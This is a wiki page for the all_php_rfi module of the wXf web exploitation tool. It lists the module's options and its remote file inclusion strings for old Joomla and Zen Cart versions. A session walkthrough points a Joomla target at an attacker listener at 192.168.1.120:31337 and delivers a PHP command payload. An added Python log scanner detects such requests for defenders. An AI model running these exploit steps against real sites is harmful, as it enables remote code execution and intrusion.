forked from forced-request/wXf
exploit rfi php all php rfi
cktricky edited this page Jul 26, 2011 · 5 revisions
Ken Johnson (CKTRICKY)
Allows you to pull RFI attack strings out of the database. You can choose an RFI string and send off the request.
COOKIE                                      true   Example: uniquecookie=cookievalue
PROXYA                                      false  Proxy IP Address
PROXYP                                      false  Proxy Port Number
RFI                                         true   Enter the RFI by name
RURL      http://www.example.com/test.php   true   Target address
THROTTLE  0                                 false  Specify a number, after x requests we pause
COOKIES -- If you have a cookie or cookies that you'd like to add to the request (whether GET or POST, doesn't matter), go ahead and set them here like so:
SINGLE COOKIE
set COOKIES ASPSESSIONID=1234;
MULTI COOKIE
set COOKIES ASPSESSIONID=1234; ASP.NET_SessionId=5678;
RFI -- Name of the RFI you'd like to use.
wXf exploit(all_php_rfi)//> show rfi
RFI List
========
Name       Description                                        Platform  Language
----       -----------                                        --------  --------
joomla_1   Joomla 1.5.0 Beta Release                          joomla    PHP
joomla_2   Joomla 1.0.8                                       joomla    PHP
joomla_3   Joomla 1.0.11, 1.0.12, 1.0.13, 1.0.14              joomla    PHP
zencart_1  Zen Cart Web Shopping Cart 1.2.7, 1.1.2 d, 1.3.0.2 zencart   PHP
wXf exploit(all_php_rfi)//> set RFI joomla_1
I'd like to exploit a vulnerable Joomla server (version 1.0.8). My IP is 192.168.1.120 and I'd like to listen on port 31337. The victim site is www.example.com.
wXf //> use exploit/rfi/php/all_php_rfi
wXf exploit(all_php_rfi)//> set RFI joomla_2
-{+}- RFI => joomla_2
wXf exploit(all_php_rfi)//> set PAYLOAD payload/rfi/php/cmd_single
-{+}- PAYLOAD => payload/rfi/php/cmd_single
wXf exploit(all_php_rfi)//> set RURL http://www.example.com/joomla
-{+}- RURL => http://www.example.com/joomla
wXf exploit(all_php_rfi)//> set LURL http://192.168.1.120:31337
-{+}- LURL => http://192.168.1.120:31337
wXf exploit(all_php_rfi)//> exploit
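For defenders, a request of the kind this session sends can be spotted in web server access logs as a query parameter whose value is a URL on a foreign host. The following is an added example, not part of the original wiki page or of wXf; the log lines, script paths and parameter names are constructed placeholders, and it assumes Combined Log Format.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Combined Log Format); paths and
# parameter names are placeholders, not real Joomla or Zen Cart files.
SAMPLE_LOG = [
    '192.168.1.120 - - [26/Jul/2011:10:00:01 +0000] "GET /joomla/index.php?id=3 HTTP/1.1" 200 5120',
    '192.168.1.120 - - [26/Jul/2011:10:00:07 +0000] "GET /joomla/example.php?example_path=http://192.168.1.120:31337/ HTTP/1.1" 200 312',
    '10.0.0.5 - - [26/Jul/2011:10:01:12 +0000] "GET /joomla/login.php?return=http%3A%2F%2Fwww.example.com%2Fjoomla%2F HTTP/1.1" 302 0',
    '192.168.1.120 - - [26/Jul/2011:10:02:30 +0000] "GET /joomla/example.php?example_path=http%253A%252F%252F192.168.1.120%253A31337%252F HTTP/1.1" 404 0',
]

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def remote_include_params(target, own_hosts=()):
    """Return (name, value) pairs whose decoded value is a URL on a foreign host."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # second decode pass catches double-encoded values
        if not REMOTE_SCHEME.match(decoded):
            continue
        host = (urlsplit(decoded.strip()).hostname or "").lower()
        if host not in own_hosts:  # links back to our own site are expected
            hits.append((name, decoded))
    return hits


def scan(lines, own_hosts=()):
    """Return one finding per suspicious parameter in the given log lines."""
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a parseable request line
        client, method, target, status = match.groups()
        for name, value in remote_include_params(target, own_hosts):
            findings.append({"client": client, "method": method, "param": name,
                             "value": value, "status": status})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, own_hosts={"www.example.com"}):
        print(finding)
```

The `own_hosts` allow-list keeps ordinary redirect parameters that point back to the site itself from being reported; the response status in each finding helps triage which requests reached an existing script.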